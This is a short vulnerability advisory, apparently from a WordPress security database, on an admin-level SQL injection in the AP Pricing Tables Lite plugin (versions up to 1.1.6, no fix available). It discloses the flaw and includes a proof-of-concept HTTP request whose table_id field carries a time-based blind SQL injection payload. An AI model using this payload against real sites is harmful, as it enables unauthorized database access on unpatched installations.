WordPress Plugin Vulnerabilities
AP Pricing Tables Lite <= 1.1.6 - Admin+ SQLi
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 115 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://localhost/wp-admin/admin.php?page=ap-pricing-tables-lite Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [Admin+] Connection: close action=backend_ajax&_action=copy_table&table_id=124+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce=<nonce>
Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
Simone Onofri, Donato Onofri
Submitter
Simone Onofri, Donato Onofri
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2023-05-10 (about 4 months ago)
Added
2023-05-10 (about 4 months ago)
Last Updated
2023-05-10 (about 4 months ago)